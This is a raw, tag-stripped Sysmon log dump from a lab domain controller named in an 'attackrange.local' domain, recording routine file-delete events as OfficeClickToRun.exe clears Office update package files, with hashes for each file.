Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME07.CSSMD5=160EB1BAB31D3300039D7592F9E64484,SHA256=CE8AB46415CCD86F74C4F27AA903EEB0DAB9F8F429B94649ACB4CA038C0A0DC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME06.CSSMD5=35AEECD3249E5E23069E0611F7C45B5B,SHA256=90136FEC058ECEF8FE4356D70236094BB6969F204248D7DCAB22E164EEF006A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME05.CSSMD5=CC4370E7ED6BA8A513B7806C176A1B24,SHA256=81F1BC02B2C9B3098D13E6F89DF9F3C6995F91BA0AA21820E425B69D1DC481DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME04.CSSMD5=811C6CC1B054FD7FD1F5BF6CEC87D55B,SHA256=14A0B2E88067F44526CAAACCD8C8777BD54357621D3EAAD096C8F6C91EF41B7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME03.CSSMD5=9C1F747AE8803B49D4B6781FC2B9EF93,SHA256=0D2DC96125B7A3543642E367EAC093FBA89E376F95F3EF94E1EA8AAE0B41081F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME02.CSSMD5=84A593FF70A2CD07E91B920C1BD7C42C,SHA256=153224766855B2E9CD49FD0B94D481D54FC85D4D06B7B7BE304C559FD941C173,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\SCHEME01.CSSMD5=A8DE447A639B15636E8A66E26C86FDC6,SHA256=84383877BE0419BE39A7F3E8361734404DF053940D836103B8C29B5516846F90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\PUBFTSCM\FONTSCHM.INIMD5=3E1E83229DA76CE9C58DA07908B9532B,SHA256=949C21A9365F139BA7242E7409956CFAADF4185502CED5F11380102B13A0EB11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\DataServices\FOLDER.ICOMD5=A6DDCCFDAD18D5CA7AAEB168B6D02253,SHA256=3114451F95C7FB8D7D884A19C724F6C7FF906B6D9BEC1BF7C6300D2CCA4F43A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\DataServices\DESKTOP.INIMD5=466AFDBDD30770A1A6B47AFD85099E82,SHA256=D63E228A2173E58FA14818AAF610E9E6676D2D9836C5C2ED83BA6A783B7BB999,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\DataServices\+NewSQLServerConnection.odcMD5=149E8C684B9EA9887DD2E7E596E7187C,SHA256=43B12E68FB3B5BCC4099D796FA670A62B116A894437454A20050661DEF9D8816,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\DataServices\+Connect to New Data Source.odcMD5=16A8A9A2B0A8B65FAF28E1007DB6733F,SHA256=3A13080059292811E5AC3F9E8B04B2C8EEA95D6A5538116AD751D11C834E6056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\Bibliography\BIBFORM.XMLMD5=FB78C57E0E039AE4B8CC688DF76C966F,SHA256=584BD28F9C967F31E34F395C50D5E32EBD08BD38F0EFB9C433ABEA2C489416D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office15\pkeyconfig-office.xrm-msMD5=B7786A85291AB8B736718BE0BDB8C8E8,SHA256=12321543ED69DE70DE79CF9066AE68160F8D4375FF8DEA1360AE1E41FBE7F357,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.080{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office15\pidgenx.dllMD5=EB816AF86F911BBFE1DC0B091DD40F83,SHA256=17A52D5BAC977C3C71E95D5F393573625C2DADABCA5D485F39E33C4B0E457D92,IMPHASH=80CA698E066444E9F8C0272252110998truetrue 23542300x800000000000000068103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\loc\AppXManifestLoc.16.en-us.xmlMD5=C9828B37D1010216A89F9D8845F417D9,SHA256=FBF2941DC4DD083D92D0FD845CD3492DFE3B1FC64BDF886BC7401FEF20D0C642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.064{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordVL_MAK-ul-phn.xrm-msMD5=D33508993353F5D844AAEA2A36E5D4D2,SHA256=690C398352B7E46A20140F51180BF4EDE7130250B39432510C00EBF353488F85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordVL_MAK-ul-oob.xrm-msMD5=A8A6F064B984EADB3EF8BBA513B555D4,SHA256=0680683C42A8D6170A106BC81B10D8633A2B000671FF9F72AFA87BB8B294CA5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordVL_MAK-ppd.xrm-msMD5=D90314DD3440B9E97DE7FA714B858562,SHA256=AC8B44761E08B5A96CE430F331C0AC2761B379502B6B2F52AB85FEE5B51786CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordVL_MAK-pl.xrm-msMD5=6BCD371BFB720B7C34113ED7526DA941,SHA256=95BD191C6214B824B8343C2406FA782BFD6E276B13AD0AA4B5E72F193BD15C64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordVL_KMS_Client-ul.xrm-msMD5=3EC2CAC2F05F070668F60706A02655A0,SHA256=80B7FD43714EAED41A9B9E41D30F9B11E4564495E47AA7AD50829CCFA270FEA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordVL_KMS_Client-ul-oob.xrm-msMD5=1301E06C85E2F1B73E1252805B07454C,SHA256=283479564E4CF012C139147A3DD94D51FFE4D052195001578B12399EB2197D77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordVL_KMS_Client-ppd.xrm-msMD5=2351F0673C09DE28C27F278C80C3F67B,SHA256=0288B11176881FE836CDA5009339FA114A2DCCB159D4A7CEB7A0C48D6CCA0102,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_Trial-ul-oob.xrm-msMD5=0CDE01D983EFAE3EB9BDF3557A534A8B,SHA256=7178E99390F7AF7D029AB22E9C00E2C9069B7B97E9D0613CFE498408BE2908C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_Trial-ppd.xrm-msMD5=684E6C0F43EB03671E30E1B6A2DC2601,SHA256=128D904DA8858422E0CB16621D1528CAC07BD9A3FFAB40CC6CB93D33FCD75D25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_Trial-pl.xrm-msMD5=CB7F4628E8C21AF8D2EF539458A2646D,SHA256=E3AE4BC3E4269E4AD937349DA40C5BFE6EE5F49CC6895F69C18E1A403AE47025,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_Retail-ul-phn.xrm-msMD5=FAECBC48CFE2073D169C2BF19834D349,SHA256=966426F8619DBF24D9453611F6B3A8F5B94FA357E0DE6C46801BCB7784A7501B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_Retail-ul-oob.xrm-msMD5=4ABBA2341B4A5285BBC72C32D2E04F82,SHA256=78E2E9BEC49FAAE4B66083481136FA6EB98CF23F45279A4DFCA58FB71045E52A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_Retail-ppd.xrm-msMD5=1D925728AA9F9FC8CD0D4752B449D893,SHA256=A999BBCD43FDE7B70CDD900A945EB6ACB5417A5CDF54EF959D2F62302F943042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_Retail-pl.xrm-msMD5=137B6A3716E4D93003F9189C3A80C748,SHA256=5E3FBB765933284F79F7D886C1EBB61FB3F7848402196206ACA64167E126D783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_OEM_Perp-ul-phn.xrm-msMD5=1A2A7B242C71D0A4DD42C74A4158020F,SHA256=2A4D7F4A25AB97021051B3ED83FB86ABEAB5DC05325C2BBB35D89414F035D089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_OEM_Perp-ul-oob.xrm-msMD5=9A93903CF17FED6DCBA8F5FA58A85C2C,SHA256=FD253B385A39E1F129336F4823616450F8F54FC156BE12F2A1F2A02AF7EACAAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_OEM_Perp-ppd.xrm-msMD5=277415931F12C9F0F5C04966B4559D57,SHA256=8ACC7057ECC40F4471D56E4A93B5B6D3F926FE79BD5E61733210702DE0F54962,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_OEM_Perp-pl.xrm-msMD5=9D36E5660965FE70071E3F31788ADCE6,SHA256=BA9012021F6DED3DC2D5A4D4E3F04D0415970744C102376292C349D456D2C350,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_Grace-ul-oob.xrm-msMD5=8AFC3CE7499846D9E3C71CB1DCA9C9F8,SHA256=6841F4028F76E3F2BEE9EFF9C2BE492E20EFF2723278D60F0FDC32B843429A8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\WordR_Grace-ppd.xrm-msMD5=7D53FCC59E58E463E2D73FF3BE3A87EC,SHA256=CB9AF3BE04D049327E4A0945D9C493720BF260DCE2B0387791AA9F881501F13F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019VL_MAK_AE-ul-phn.xrm-msMD5=C0579AAD5E7A1259A7B77CC703199ED3,SHA256=3A5E15121323B3EB47B6D7C6F0DA853B58B0F9B6485EB747963BC3C9744E3739,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019VL_MAK_AE-ul-oob.xrm-msMD5=07395470B58FB128679F9E957F9C6230,SHA256=BCD74F165C9DC5A158595AE3C476979539840F9C9C89CF5E49D1F356E06265BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019VL_MAK_AE-ppd.xrm-msMD5=7712CAC1520F17718A2BBF2178C1BA8F,SHA256=71CBDFE01DC479063141913CE92654AE35162886A1E9E59E5E9CBE0BE962FB28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019VL_MAK_AE-pl.xrm-msMD5=4951128D484C926BE43D65A162833E73,SHA256=218836A877E98500A66930E08E9F5B82170EF8445E0AF16B60000B73A4F5B68E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019VL_KMS_Client_AE-ul.xrm-msMD5=E33552B535D827D8183925ADF9D79160,SHA256=56FA258CA6658DF7D95D9DDE81868670141E86365BEF21CEFE224C38E9B72DC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=0DB142F72D2454636A380C36075F58CE,SHA256=87AC072FA15296CB8E7D0C2A12DB9F81035CEDA26D3BAF27C8574F2FAF2C2E41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019VL_KMS_Client_AE-ppd.xrm-msMD5=65284287C7A23FBD979BB1E22A63EB55,SHA256=1F5DC3F55F43243554456716B14BE3B0398A876DA2DC1A45835C84483C24ED0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Word2019R_Trial-ul-oob.xrm-msMD5=8163B13890F2A44A6EBCD7C620B845B9,SHA256=F3A170A65E81A02612E955C9E222C50EED3D7DE77E6CDFA3870CE4700D4F5730,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 